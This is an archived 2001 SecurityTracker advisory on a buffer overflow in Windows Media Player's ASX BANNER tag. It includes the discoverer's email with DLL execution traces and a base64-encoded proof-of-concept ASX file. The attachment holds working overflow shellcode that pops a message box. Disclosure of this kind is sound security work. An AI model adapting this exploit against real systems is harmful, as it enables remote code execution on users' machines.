SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Multimedia)  >   Windows Media Player Vendors:   Microsoft
Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
SecurityTracker Alert ID:  1001467
SecurityTracker URL:  http://securitytracker.com/id/1001467
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 2 2001
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 6.4, possibly others
Description:   It is reported that the Windows Media Player contains a vulnerability in its processing of certain ASX tags that allows a remote user to cause the Media Player client to execute arbitrary code on the client's host.

It is reported that the processing of the HREF attribute of the BANNER tag contains a buffer overflow that can be used to smash the stack. The vulnerability reportedly exists in certain versions of DXMASF.DLL. This allows a remote user to create a malicious ASX file and deliver it to the intended victim via a web page or via an HTML-based e-mail message.

The Source Message contains some additional information as well as an encoded version of a demonstration exploit ASX file.

Impact:   A remote user can cause the Media Player to execute arbitrary code on the Media Player's host.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Another Vulnerable ASX Tag) Re: Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
A user reports another ASX tag that will trigger a buffer overflow vulnerability.
(Microsoft Releases Fix) Re: Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
The vendor has released a fix.
(Another ASX Vulnerability) Re: Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
A user reports another vulnerability.
(CIAC Issues Bulletin L-089) Re: Microsoft Windows Media Player ASX Processing Vulnerability Lets Remote Users Execute Arbitrary Code on the Player's Host System
CIAC issues a bulletin.



 Source Message Contents

Subject:  Microsoft Media Player ASX Parser buffer overflow vulnerability


This is a multi-part message in MIME format.

------=_NextPart_000_2fe8_45ca_5277
Content-Type: text/plain; format=flowed

-------------------------------------------------------------------
LEGAL STATEMENT:

The information contained in this mail message is confidential.
The information contained in this mail message is a trade
secret of mine and is protected under law.

Basically: You're not allowed to read or use or act upon the information
contained in this message unless you fall into a
category who are specifically allowed to.

1. People/entities with any formal relationship with Microsoft are
not allowed to read the content of this message.
2. People who do not fall into category 1 are allowed to do anything
they like but are not allowed to bypass this information forward.

--------------------------------------------------------------------
RANDOM RANT:

You know, somebody's got to take care of the client side.
--------------------------------------------------------------------
REVELATION:

HREF attribute of BANNER tag can be abused to smash our lovely stack.

This information applies to Media Player 6.4 at least.
You can try it out with your version at
<a
href="http://mediaplayerbug.tripod.com/">http://mediaplayerbug.tripod.com/</a>.

Known status of different versions of dxmasf.dll:
Invulnerable: Size 427280 bytes. Time stamp 0x35ed5d3d. (From Finnish SP4
CD.)
Vulnerable: Size 498960 bytes. Time stamp 0x382cbe58. (From mpfull.exe
version 6.4. dunno more.)
Vulnerable: Size 525008 bytes. Time stamp 0x3a2ed2f1. (The patched version
that comes in wmqfe33955.exe.)
(Got the time stamps using File Viewer.)

As what comes to the .asx attachment, it won't work as it is. You've
got to edit it to refer a valid .asf/.avi file. I didn't want to waste
bandwidth. It is a text file so that should not be too much a trouble.

Umm. Analysis.txt is at Tripod too, no link to it though. Guess the
URL if you need it. :)
_________________________________________________________________________
Get Your Private, Free E-mail from MSN Hotmail at http://www.hotmail.com.

------=_NextPart_000_2fe8_45ca_5277
Content-Type: text/plain; name="Analysis.txt"; format=flowed
Content-Transfer-Encoding: 8bit
Content-Disposition: attachment; filename="Analysis.txt"

Known status of different versions of dxmasf.dll:
Invulnerable: Size 427280 bytes. Time stamp 0x35ed5d3d. (From Finnish SP4
CD.)
Vulnerable: Size 498960 bytes. Time stamp 0x382cbe58. (From mpfull.exe
version 6.4. dunno more.)
Vulnerable: Size 525008 bytes. Time stamp 0x3a2ed2f1. (The patched version
that comes in wmqfe33955.exe.)
(Got the time stamps using File Viewer.)

Some nice analysis data is attached. These are in no way complete and even
some false information might appear here or there.

--8<------------------------Cut-here---------------------------8<-------------

Execution path of DXMASF.DLL (Time stamp 0x3a2ed2f1.) in detail follows.
This is the recently patched one.

1D3612BD : MSDXM!0x1D3197F0( 0x00298678, 0x0009e724, 0x002a015c ) {
	1D3197F0 :
	1D319843 : Kernel32!LoadLibraryA("dxmasf.dll")
	1D319858 : Kernel32!GetProcAddress("UtilLoadImage",0x11f00000,0)
	1D31987A : Kernel32!0x77F350A3(0,0,0x9e724,-1,0x6f13c,0x825,0,0)
	1D319895 : DXMASF!UtilLoadImage( ? )
		1FF26708 :
		1FF26731 : 1FF26A97()
		1FF2673C : 1FF26AA1()
			1FF26AA1 :
			1FF26AB5 : 1FF26C2A()
			1FF26ACC : Kernel32!0x77F1297C() 1FF010D8
			1FF26AD4 : 1FF3EFA6()
			1FF26AE0 : Kernel32!0x77F127E6() 1FF0108C
			1FF26AFE : 1FF3F3E8()
			1FF26B44 : 1FF3F2B4()
			1FF26B5C : 1FF3F260()
			1FF26BB5 : Wininet!0x702079AB() 1FF012F0
			1FF26BF3 : Kernel32!0x77F1297C() 1FF010D8
			1FF26BFB : 1FF3EFA6()
			1FF26C0C : Kernel32!0x77F127E6() 1FF0108C
			1FF26C19 : } <- Let the parties begin!
		1FF26741 :
	1D319898 :
1D3612C0 :

--8<------------------------Cut-here---------------------------8<-------------

Execution path of DXMASF.DLL (Time stamp 0x382cbe58.) in detail follows.

1D319895 : DXMASF!UtilLoadImage( ? ) {
	1FF26716 :
	1FF2674A : 1FF26AAF( x ) {
		1FF26ADA : Kernel32!0x77F1297C( x ) 1FF010D8
		1FF26AE2 : 1FF3EFB6()
		1FF26AEE : Kernel32!0x77F127E6() 1FF0108C
		1FF26B0C : 1FF3F3F8() (retrieve the string address at heap?)
		1FF26B3B : movs
		1FF26B52 : 1FF3F2C4:7801FAAD:fopen() (fails)
		1FF26B6A : 1FF3F270:780252FE:strrchr() (strip "C:\")
		1FF26BAC : movs
		1FF26BC3 : WININET!0x702079AB() 1FF012F0 (try if it's an URL?)
		1FF26BE8 : movs (copy back the stripped string)
		1FF26C01 : Kernel32!0x77F1297C() 1FF010D8
		1FF26C09 : 1FF3EFB6:780037CA:new()
		1FF26C1A : Kernel32!0x77F127E6() 1FF0108C
		1FF26C27 : } <- Let the parties begin!
	1FF2674F :
	}
1D319898 :

--8<------------------------Cut-here---------------------------8<-------------

Execution path of DXMASF.DLL (Time stamp 0x35ed5d3d.) in detail follows.
This is the SP4 one.

1D319895 : DXMASF!UtilLoadImage=1FF34CCD() {
	1FF34CF6 : 1FF3505C() (dummy init)
	1FF34D01 : 1FF35066( 0x0006F13C ) {
		1FF3507A : 1FF351BF()
		1FF35091 : Kernel32!0x77F1297C( 0x0006F13C ) 1FF010E8
		1FF35099 : 1FF368A6:780037CA:new( 0x178 ) 1FF011E8
		1FF350A5 : Kernel32!0x77F127E6( heapbuf(0x002A8C90), 0x0006F13C )1FF01080
{
			77F1282F : movs
			}
		1FF350AB :
		1FF350C4 : URLMON!0x702B7BC2( 0, 0x2A8C90, 0x6EFA0, 0x104 ) 1FF01328 {
			702B7BE0 : Kernel32!0x77F1297C() (strlen)
			702B7BF1 : URLMON!0x702B753C( 0x44 )
			702B7C15 : to_wide_char( 0, 0, 0x2A8FD0, -1, 0x6EDF0 ) 702712B8
			702B7C26 : OLE32!0x77B2122C( 0x208, 0x6EDF0 )
			702B7C44 : 702B77F8()
			702B7C65 : Kernel32!0x77F12AE7()
			702B7C72 : Kernel32!0x77F350A3()
			}
		1FF350EB : 1FF36D9E:7801FAAD:fopen( 0x6EFA0, 0x1FF057A0 )
		1FF350CF : 1FF368A0:78003C6E:delete( 0x2A8C90 ) 1FF011E0

	}
1D319898 :

--8<------------------------Cut-here---------------------------8<-------------


------=_NextPart_000_2fe8_45ca_5277
Content-Type: application/octet-stream; name="Money_is_wrong.asx"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Money_is_wrong.asx"

PEFTWCB2ZXJzaW9uPSIzLjAiPg0KPCEtLQ0KLSBTbyB0aGUgSFJFRiBhdHRy
aWJ1dGUgdmFsdWUgb2YgQkFOTkVSIHRhZyBpcyB0byBvdmVyZmxvdyBzb29u
Lg0KLSBUaGUgY2hhcmFjdGVyIGJlZm9yZSB0aGUgbGFzdCBvbmUgc2hvdWxk
IGJlICdcJyB0byBhdm9pZCBtYW5nbGluZw0KdGhlIGNvZGUgZWFybGllciBp
biB0aGUgZnVuY3Rpb24uIEkgZG9uJ3Qga25vdyBpZiB0aGlzIGlzIG1hbmRh
dG9yeQ0KdGhvdWdoLg0KLSA0IGNoYXJhY3RlcnMgZm9yd2FyZCBmcm9tIHN0
cmluZyBvZmZzZXQgMjY1IGFyZSBsb2FkZWQgaW50byBFQVgNCmJlZm9yZSBS
RVQuDQotIDQgY2hhcmFjdGVycyBmb3J3YXJkIGZyb20gc3RyaW5nIG9mZnNl
dCAyNjkgYXJlIGxvYWRlZCBpbnRvIEVCUA0KYmVmb3JlIFJFVC4NCi0gSSBz
dGFydCBtZXNzaW5nIHdpdGggUkVUJ3MgZm9yd2FyZCBmcm9tIDI3M3RoIGJ5
dGUgb2YgdGhlIHN0cmluZy4NCi0gSSBjaG9zZSB0aGUgcmV0dXJuIGFkZHJl
c3MgdG8gYmUgMHgxRkYwQkI5QSB3aGljaCBpcyBpbiBEWE1BU0YuRExMDQpp
dHNlbGYgYW5kIGlzIHRoZSBzYW1lIGluIGJvdGggdnVsbmVyYWJsZSB2ZXJz
aW9ucyBJIGhhZCBhY2Nlc3MgdG8uDQotIFRoZSByZXR1cm4gYWRkcmVzcyBj
b250YWlucyB0aGlzIGNvZGU6ICJSRVQgNCIgKD0gQzIgMDQgMDApLg0KLSBU
aGUgY29kZSBhbGxvd3MgdG8gcmVjdXJzZSBpbiB0aGUgc3RhY2sgdG8gYSB1
c2FibGUgcG9pbnRlciB0aGF0DQpwb2ludHMgdG8gdGhlIGJlZ2lubmluZyBv
ZiB0aGUgc3RyaW5nLiBObyBjaGFyYWN0ZXJzIGFsbG93ZWQgYWZ0ZXINCnRo
YXQgcG9pbnQgdG8gYXZvaWQgb3ZlcndyaXRpbmcgdGhlIGFkZHJlc3MuDQot
IEV4ZWN1dGlvbiBiZWdpbnMgYXQgIkM6XCFBIiAod2l0aG91dCBwYXJlbnRo
ZXNpcy4pIFRoZXNlIGNoYXJhY3RlcnMNCmZvcm0gdmFsaWQgaW5zdHJ1Y3Rp
b25zIHNvIHRoZXkgZG9uJ3QgZG8gYW55IGhhcm0uDQoNCkVCIDMyIAkJCTsg
am1wIGZvcndhcmQNCjVGCQkJOyBwb3AgZWRpIAkJOyBnb3QgdGhlIG1lc3Nh
Z2Ugc3RyaW5nIGFkZHJlc3MNCjMzIEMwIAkJCTsgeG9yIGVheCxlYXgNCjUw
IAkJCTsgcHVzaCBlYXggCQk7IHB1c2ggMA0KNTcJCQk7IHB1c2ggZWRpCQk7
IHB1c2ggbWVzc2FnZSBzdHJpbmcgYWRkcmVzcw0KDQo4MyBFRiAwNgkJOyBz
dWIgZWRpLCA2DQpBQQkJCTsgc3Rvc2INCjgzIEM3IDE2CQk7IGFkZCBlZGks
IDIyDQpBQQkJCTsgc3Rvc2IJCQk7IHNldCB0ZXJtaW5hdG9yIGJ5dGUNCjU3
IAkJCTsgcHVzaCBlZGkgCQk7IHB1c2ggY2FwdGlvbiBzdHJpbmcgYWRkcmVz
cw0KODMgQzcgMzYJCTsgYWRkIGVkaSwgNTQNCkFBCQkJOyBzdG9zYgkJCTsg
c2V0IHRlcm1pbmF0b3IgYnl0ZQ0KNTAgCQkJOyBwdXNoIGVheCAJCTsgcHVz
aCAwDQpGRiAxNSA3QyAxMiBGMCAxRiAJOyBjYWxsIFsxRkYwMTI3Q10gCTsg
Y2FsbCBNZXNzYWdlQm94QQ0KDQpCOCBBOCBGRiBGOCA3RgkJOyBtb3YgZWF4
LCA3RkY4RkZBOA0KRjcgRDAJCQk7IG5vdCBlYXgNCjVGCQkJOyBwb3AgZWRp
CQkNCjVGCQkJOyBwb3AgZWRpCQkNCjVGCQkJOyBwb3AgZWRpDQo1RgkJCTsg
cG9wIGVkaQ0KNUUJCQk7IHBvcCBlc2kNCjVCCQkJOyBwb3AgZWJ4DQoNCjhC
IEVDCQkJOyBtb3YgZWJwLCBlc3AJCQ0KODEgRUQgQ0MgRjcgRkYgRkYJOyBz
dWIgZWJwLCAtMjEwMA0KDQpDOQkJCTsgbGVhdmUNCkMyIDBDIHh4CQk7IHJl
dCAweEMNCkU4IEM5IEZGIEZGIEZGIAkJOyBjYWxsIGJhY2t3YXJkDQpkYiAn
RHJ1Z3MgYXJlIGJhYWQuLi4nDQpkYiAnWW91IHNob3VsZCBub3QgdXNlIGRy
dWdzLiBZb3Uga25ldyB0aGF0PyBPaCBzaWxseSBtZWUuJw0KLS0+DQo8QkFO
TkVSIEhSRUY9IkM6XCFB6zJfM8BQV4PvBqqDxxaqV4PHNqpQ/xV8EvAfuKj/
+H/30F9fX19eW4vsge3M9///ycIMeOjJ////RHJ1Z3MgYXJlIGJhYWQuLi54
WW91IHNob3VsZCBub3QgdXNlIGRydWdzLiBZb3Uga25ldyB0aGF0PyBPaCBz
aWxseSBtZWUueEFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB
QUFBQT1lYXg9ZWJwmrvwH0FBQUGau/AfQUFBQZq78B9BQUFBmrvwH0FBQUGa
u/AfQUFBQZq78B9BQUFBmrvwH0FBQUGau/AfQUFBQZq78B9BQUFBmrvwH0FB
QUGau/AfQUFBQZq78B9BQUFBmrvwH0FcQSIvPg0KPEVOVFJZPjxSRUYgSFJF
Rj0iY2xvY2suYXZpIiAvPjwvRU5UUlk+DQo8L0FTWD4NCg==


------=_NextPart_000_2fe8_45ca_5277--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC